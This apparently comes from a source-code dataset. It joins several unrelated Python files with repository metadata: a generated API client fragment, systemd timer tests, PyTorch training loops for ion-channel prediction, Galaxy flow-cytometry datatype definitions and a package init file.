header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_update' in local_var_params:
body_params = local_var_params['user_update']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateAccepted', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 41.26691 | 128 | 0.587339 | 2,460 | 22,573 | 5.13252 | 0.079675 | 0.033582 | 0.048788 | 0.034215 | 0.93054 | 0.92167 | 0.919373 | 0.915888 | 0.89886 | 0.892365 | 0 | 0.012129 | 0.342577 | 22,573 | 546 | 129 | 41.342491 | 0.838679 | 0.498693 | 0 | 0.694323 | 1 | 0 | 0.159925 | 0.029635 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039301 | false | 0 | 0.021834 | 0 | 0.100437 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3af7f8577e6beb47a9b309eeb3a6859028d436d2 | 4,786 | py | Python | tests/test_systemdu.py | atareao/daily-wallpaper | ad7fb04064f1af79afb6dda93883071cac6bd549 | [
"MIT"
] | 26 | 2020-06-14T08:28:44.000Z | 2022-03-13T13:56:15.000Z | tests/test_systemdu.py | atareao/daily-wallpaper | ad7fb04064f1af79afb6dda93883071cac6bd549 | [
"MIT"
] | 18 | 2020-06-14T08:47:03.000Z | 2021-10-07T12:19:52.000Z | tests/test_systemdu.py | atareao/daily-wallpaper | ad7fb04064f1af79afb6dda93883071cac6bd549 | [
"MIT"
] | 7 | 2020-08-07T09:02:58.000Z | 2021-09-13T02:26:32.000Z | import unittest
import os
import sys
sys.path.insert(1, 'src')
from systemdu import SystemdUser
from systemdu import USER_PATH
TEST_TIMER_FILE = 'test.timer'
TEST_SERVICE_FILE = 'test.service'
class TestSystemdUser(unittest.TestCase):
def setUp(self):
if os.path.exists(TEST_TIMER_FILE):
os.remove(TEST_TIMER_FILE)
if os.path.exists(TEST_SERVICE_FILE):
os.remove(TEST_SERVICE_FILE)
with open(TEST_TIMER_FILE, 'w') as fw:
fw.write('[Unit]\n')
fw.write('Description=Test Timer every 5 minutes\n')
fw.write('\n')
fw.write('[Timer]\n')
fw.write('OnCalendar=minutely\n')
fw.write('\n')
fw.write('[Install]\n')
fw.write('WantedBy=timers.target\n')
with open(TEST_SERVICE_FILE, 'w') as fw:
fw.write('[Unit]\n')
fw.write('Description=Test Service\n')
fw.write('\n')
fw.write('[Service]\n')
fw.write('Type=oneshot\n')
fw.write('ExecStart=echo "Test timer"\n')
def test_install(self):
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)))
systemdu.install(TEST_SERVICE_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)))
def test_enable(self):
try:
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)))
systemdu.install(TEST_SERVICE_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)))
systemdu.enable(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_enabled(TEST_TIMER_FILE))
finally:
systemdu.disable(TEST_TIMER_FILE)
def test_start(self):
try:
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def test_stop(self):
try:
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
systemdu.stop(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_active(TEST_TIMER_FILE))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def test_disable(self):
try:
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
systemdu.stop(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_active(TEST_TIMER_FILE))
systemdu.disable(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_enabled(TEST_TIMER_FILE))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def test_uninstall(self):
try:
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
systemdu.stop(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_active(TEST_TIMER_FILE))
systemdu.disable(TEST_TIMER_FILE)
systemdu.uninstall(TEST_TIMER_FILE)
self.assertFalse(os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def tearDown(self):
if os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)):
os.remove(os.path.join(USER_PATH, TEST_TIMER_FILE))
if os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)):
os.remove(os.path.join(USER_PATH, TEST_SERVICE_FILE))
if os.path.exists(TEST_TIMER_FILE):
os.remove(TEST_TIMER_FILE)
if os.path.exists(TEST_SERVICE_FILE):
os.remove(TEST_SERVICE_FILE)
if __name__ == '__main__':
unittest.main()
| 36.815385 | 88 | 0.633723 | 583 | 4,786 | 4.919383 | 0.108062 | 0.16318 | 0.222106 | 0.146444 | 0.838912 | 0.819038 | 0.802301 | 0.782775 | 0.74477 | 0.721409 | 0 | 0.000569 | 0.265148 | 4,786 | 129 | 89 | 37.100775 | 0.814899 | 0 | 0 | 0.663717 | 0 | 0 | 0.050564 | 0.009402 | 0 | 0 | 0 | 0 | 0.123894 | 1 | 0.070796 | false | 0 | 0.044248 | 0 | 0.123894 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aaf6210ed97b3d4cb047999d4440498d0975079c | 12,303 | py | Python | training/training.py | statsu1990/kaggle_ion_switching | 487025284cdfc79741a744e73f77b4bf86490e30 | [
"MIT"
] | null | null | null | training/training.py | statsu1990/kaggle_ion_switching | 487025284cdfc79741a744e73f77b4bf86490e30 | [
"MIT"
] | null | null | null | training/training.py | statsu1990/kaggle_ion_switching | 487025284cdfc79741a744e73f77b4bf86490e30 | [
"MIT"
] | null | null | null | import torch
import numpy as np
from tqdm import tqdm
from .scheduler import WarmUpLR
from .train_utils import save_log, save_checkpoint
from data import metric
class MacroF1ScoreCalculater:
def __init__(self):
self.y_true = []
self.y_pred = []
self.group = []
def add_result(self, y_true, y_pred, group):
self.time_length = y_true.shape[1]
self.y_true.append(np.ravel(y_true))
self.y_pred.append(np.ravel(y_pred))
self.group.append(np.repeat(group, y_true.shape[1]))
def calc_score(self, use_group=False):
y_true = np.concatenate(self.y_true)
y_pred = np.concatenate(self.y_pred)
group = np.concatenate(self.group)
print("All score")
score = metric.macro_f1(y_true, y_pred, group=None, print_log=True)
if use_group:
print("Group score")
scores_gr = metric.macro_f1(y_true, y_pred, group=group, print_log=True)
return score
def calc_score_region_wise(self, num_region):
y_true = np.concatenate(self.y_true)
y_pred = np.concatenate(self.y_pred)
region_idxs = (np.arange(len(y_true)) % self.time_length) // (self.time_length // num_region)
scores = []
for rg in range(num_region):
#print(np.sum(region_idxs==rg))
scores.append(metric.macro_f1(y_true[region_idxs==rg], y_pred[region_idxs==rg], group=None, print_log=False))
print([str(s)[:5] for s in scores])
return scores
def real_to_integer(value, min=0, max=10):
return np.clip(np.round(value).astype('int'), min, max)
def trainer(net, loader, criterion, optimizer, grad_accum_steps, warmup_scheduler, use_label=False, classification=True, score_use_group=False):
net.train()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
optimizer.zero_grad()
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if warmup_scheduler is not None:
warmup_scheduler.step()
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
if use_label:
outputs, additional_output = net(signals, trams_mtrxs, open_channels)
loss = criterion(outputs, additional_output[0], additional_output[1], additional_output[2])
else:
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
loss = criterion(outputs, open_channels)
loss = loss / grad_accum_steps
loss.backward()
if (batch_idx + 1) % grad_accum_steps == 0:
optimizer.step()
optimizer.zero_grad()
# loss
total_loss += loss.item() * grad_accum_steps
# score
with torch.no_grad():
if classification:
score_calclater.add_result(open_channels.cpu().numpy(), outputs.max(2)[1].cpu().numpy(), group.cpu().numpy())
else:
# regression
score_calclater.add_result(open_channels.cpu().numpy(), real_to_integer(outputs.cpu().numpy()), group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Train Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def tester(net, loader, criterion, classification=True, score_use_group=False):
net.eval()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
with torch.no_grad():
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
if criterion is not None:
loss = criterion(outputs, open_channels)
# loss
total_loss += loss.item()
else:
total_loss += 0
# score
if classification:
score_calclater.add_result(open_channels.cpu().numpy(), outputs.max(2)[1].cpu().numpy(), group.cpu().numpy())
else:
# regression
score_calclater.add_result(open_channels.cpu().numpy(), real_to_integer(outputs.cpu().numpy()), group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Valid Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def train_model(net, tr_loader, vl_loader, use_label,
optimizer, tr_criterion, vl_criterion,
grad_accum_steps, start_epoch, epochs,
warmup_epoch, step_scheduler, filename_head='',
classification=True):
# warmup_scheduler
if start_epoch < warmup_epoch:
warmup_scheduler = WarmUpLR(optimizer, len(tr_loader) * warmup_epoch)
else:
warmup_scheduler = None
# train
loglist = []
for epoch in range(start_epoch, epochs):
if epoch > warmup_epoch - 1:
warm_sch = None
step_scheduler.step()
else:
warm_sch = warmup_scheduler
print('\nepoch ', epoch)
for param_group in optimizer.param_groups:
print('lr ', param_group['lr'])
now_lr = param_group['lr']
score_use_group = (epoch == epochs - 1)
tr_log = trainer(net, tr_loader, tr_criterion, optimizer, grad_accum_steps, warm_sch, use_label, classification, score_use_group)
vl_log = tester(net, vl_loader, vl_criterion, classification, score_use_group)
# save checkpoint
save_checkpoint(epoch, net, optimizer, step_scheduler, filename_head + 'checkpoint')
# save log
loglist.append([epoch] + [now_lr] + list(tr_log) + list(vl_log))
colmuns = ['epoch', 'lr', 'tr_loss', 'tr_score', 'vl_loss', 'vl_score']
save_log(loglist, colmuns, filename_head + 'training_log.csv')
return net
def trainer_v2(net, loader, criterion, optimizer, grad_accum_steps, warmup_scheduler, use_label=False, classification=True, score_use_group=False):
net.train()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
optimizer.zero_grad()
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if warmup_scheduler is not None:
warmup_scheduler.step()
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
#
cor_label = torch.eq(torch.argmax(signals, dim=1), open_channels).long()
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
loss = criterion(outputs, cor_label)
loss = loss / grad_accum_steps
loss.backward()
if (batch_idx + 1) % grad_accum_steps == 0:
optimizer.step()
optimizer.zero_grad()
# loss
total_loss += loss.item() * grad_accum_steps
# score
with torch.no_grad():
sig_arg = np.argsort(signals.cpu().numpy(), axis=1)
pred = outputs.max(2)[1].cpu().numpy()
pred_label = sig_arg[:,-1,:]
pred_label[pred==0] = (sig_arg[:,-2,:])[pred==0]
score_calclater.add_result(open_channels.cpu().numpy(), pred_label, group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Train Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def tester_v2(net, loader, criterion, classification=True, score_use_group=False):
net.eval()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
with torch.no_grad():
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
#
cor_label = torch.eq(torch.argmax(signals, dim=1), open_channels).long()
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
if criterion is not None:
loss = criterion(outputs, cor_label)
# loss
total_loss += loss.item()
else:
total_loss += 0
# score
sig_arg = np.argsort(signals.cpu().numpy(), axis=1)
pred = outputs.max(2)[1].cpu().numpy()
pred_label = sig_arg[:,-1,:]
pred_label[pred==0] = (sig_arg[:,-2,:])[pred==0]
score_calclater.add_result(open_channels.cpu().numpy(), pred_label, group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Valid Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def train_model_v2(net, tr_loader, vl_loader, use_label,
optimizer, tr_criterion, vl_criterion,
grad_accum_steps, start_epoch, epochs,
warmup_epoch, step_scheduler, filename_head='',
classification=True):
# warmup_scheduler
if start_epoch < warmup_epoch:
warmup_scheduler = WarmUpLR(optimizer, len(tr_loader) * warmup_epoch)
else:
warmup_scheduler = None
# train
loglist = []
for epoch in range(start_epoch, epochs):
if epoch > warmup_epoch - 1:
warm_sch = None
step_scheduler.step()
else:
warm_sch = warmup_scheduler
print('\nepoch ', epoch)
for param_group in optimizer.param_groups:
print('lr ', param_group['lr'])
now_lr = param_group['lr']
score_use_group = (epoch == epochs - 1)
tr_log = trainer_v2(net, tr_loader, tr_criterion, optimizer, grad_accum_steps, warm_sch, use_label, classification, score_use_group)
vl_log = tester_v2(net, vl_loader, vl_criterion, classification, score_use_group)
# save checkpoint
save_checkpoint(epoch, net, optimizer, step_scheduler, filename_head + 'checkpoint')
# save log
loglist.append([epoch] + [now_lr] + list(tr_log) + list(vl_log))
colmuns = ['epoch', 'lr', 'tr_loss', 'tr_score', 'vl_loss', 'vl_score']
save_log(loglist, colmuns, filename_head + 'training_log.csv')
return net
| 36.507418 | 148 | 0.591563 | 1,504 | 12,303 | 4.587766 | 0.097739 | 0.033913 | 0.033913 | 0.041739 | 0.865072 | 0.855652 | 0.849855 | 0.849855 | 0.841739 | 0.841739 | 0 | 0.012843 | 0.291149 | 12,303 | 336 | 149 | 36.616071 | 0.778351 | 0.047468 | 0 | 0.793722 | 0 | 0 | 0.026344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049327 | false | 0 | 0.026906 | 0.004484 | 0.121076 | 0.06278 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3292df62f0cbdb5aa9a2c70622f0cca4c55f1ca | 13,792 | py | Python | lib/galaxy/datatypes/flow.py | emily101-gif/immport-galaxy | 8f353d1f9b4e0d044e1a9d0b1f928b440df78b8c | [
"CC-BY-3.0"
] | 1 | 2020-01-06T21:04:22.000Z | 2020-01-06T21:04:22.000Z | lib/galaxy/datatypes/flow.py | emily101-gif/immport-galaxy | 8f353d1f9b4e0d044e1a9d0b1f928b440df78b8c | [
"CC-BY-3.0"
] | 7 | 2019-04-26T12:29:58.000Z | 2022-03-02T04:33:12.000Z | lib/galaxy/datatypes/flow.py | emily101-gif/immport-galaxy | 8f353d1f9b4e0d044e1a9d0b1f928b440df78b8c | [
"CC-BY-3.0"
] | 7 | 2016-11-03T19:11:01.000Z | 2020-05-11T14:23:52.000Z | # -*- coding: utf-8 -*-
######################################################################
# Copyright (c) 2016 Northrop Grumman.
# All rights reserved.
######################################################################
"""
Flow analysis datatypes.
"""
import gzip
import json
import logging
import os
import sys
import re
import subprocess
import tempfile
from galaxy.datatypes.binary import Binary
from galaxy.datatypes.tabular import Tabular
from galaxy.datatypes.data import get_file_peek, Text
from galaxy.datatypes.metadata import MetadataElement
from galaxy.util import nice_size, string_as_bool
from . import data
log = logging.getLogger(__name__)
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
class FCS(Binary):
"""Class describing an FCS binary file"""
file_ext = "fcs"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary FCS file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Binary FCSfile (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
Checking if the file is in FCS format. Should read FCS2.0, FCS3.0
and FCS3.1
For this to work, need to have install checkFCS.R via bioconda
conda install ig-checkflowtypes
"""
try:
rscript = 'checkFCS.R'
fcs_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(fcs_check)):
return True
else:
return False
except:
False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format("fcs", "fcs", FCS)
class FlowFrame( Binary ):
"""R Object containing flowFrame saved with saveRDS"""
file_ext = 'flowframe'
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary RDS flowFrame file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Binary RDS flowFrame (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
Checking if the file is a flowFrame R object.
For this to work, need to have install checkFlowframe.R via bioconda
conda install ig-checkflowtypes
"""
try:
rscript = 'checkFlowframe.R'
ff_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(ff_check)):
return True
else:
return False
except:
False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format('flowframe', 'flowframe', FlowFrame)
class FlowSOM( Binary ):
"""R Object containing fSOM saved with saveRDS"""
file_ext = 'fsom'
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary RDS fsom file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Binary RDS fsom (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
Checking if the file is a FlowSOM R object.
For this to work, need to have install checkFlowSOM.R via bioconda
conda install ig-checkflowtypes
"""
try:
rscript = 'checkFlowSOM.R'
fcs_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(fcs_check)):
return True
else:
return False
except:
False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format('fsom', 'fsom', FlowSOM)
class FlowSet( Binary ):
"""R Object containing flowSet saved with saveRDS"""
file_ext = 'flowset'
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary RDS flowSet file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Binary RDS flowSet (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
Checking if the file is a flowSet R object.
For this to work, need to have install checkFlowSet.R via bioconda
conda install ig-checkflowtypes
"""
try:
rscript = 'checkFlowSet.R'
fcs_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(fcs_check)):
return True
else:
return False
except:
False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format('flowset', 'flowset', FlowSet)
class FlowText(Tabular):
"""Class describing an Flow Text file"""
file_ext = "flowtext"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Text Flow file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Text Flow file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
f.readline()
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowClustered(Tabular):
"""Class describing a Flow Text that has been clustered through FLOCK"""
file_ext = "flowclr"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Text Flow Clustered file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Text Clustered file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on headers and values"""
with open(filename, "r") as f:
population = f.readline().strip().split("\t")[-1]
if population != "Population":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowMFI(Tabular):
"""Class describing a Flow MFI file"""
file_ext = "flowmfi"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "MFI Flow file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "MFI Flow file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
population = f.readline().strip().split("\t")[0]
if population != "Population":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowStats1(Tabular):
"""Class describing a Flow Stats file"""
file_ext = "flowstat1"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Stats1 file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Stats1 file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
first_header = f.readline().strip().split("\t")[0]
if first_header != "FileID":
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowStats2(Tabular):
"""Class describing a Flow Stats file"""
file_ext = "flowstat2"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Stats2 file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Stats2 file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
smp_name = f.readline().strip().split("\t")[-1]
if smp_name != "SampleName":
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowStats3(Tabular):
"""Class describing a Flow Stats file"""
file_ext = "flowstat3"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Stats3 file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Stats3 file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
last_col = f.readline().strip().split("\t")[-1]
if last_col != "Percentage_stdev":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowScore(Tabular):
"""Class describing a Flow Score file"""
file_ext = "flowscore"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Score file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Score file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
population = f.readline().strip().split("\t")[0]
if population != "Population_ID":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
| 31.063063 | 89 | 0.574971 | 1,628 | 13,792 | 4.77457 | 0.110565 | 0.0467 | 0.042455 | 0.053776 | 0.823363 | 0.804065 | 0.804065 | 0.79506 | 0.7912 | 0.748874 | 0 | 0.003063 | 0.313443 | 13,792 | 443 | 90 | 31.133183 | 0.817827 | 0.138051 | 0 | 0.730897 | 0 | 0 | 0.125558 | 0.023712 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149502 | false | 0 | 0.046512 | 0 | 0.471761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a345ccb453aa102657c2ab6e268244579e13988f | 70 | py | Python | recursive_RM/__init__.py | Joshua1989/recursive_RM | 741d2b51e39c3a48cfb671226178781898766e42 | [
"MIT"
] | null | null | null | recursive_RM/__init__.py | Joshua1989/recursive_RM | 741d2b51e39c3a48cfb671226178781898766e42 | [
"MIT"
] | null | null | null | recursive_RM/__init__.py | Joshua1989/recursive_RM | 741d2b51e39c3a48cfb671226178781898766e42 | [
"MIT"
] | 1 | 2020-06-09T11:46:44.000Z | 2020-06-09T11:46:44.000Z | from recursive_RM.common import *
from recursive_RM.decoders import *
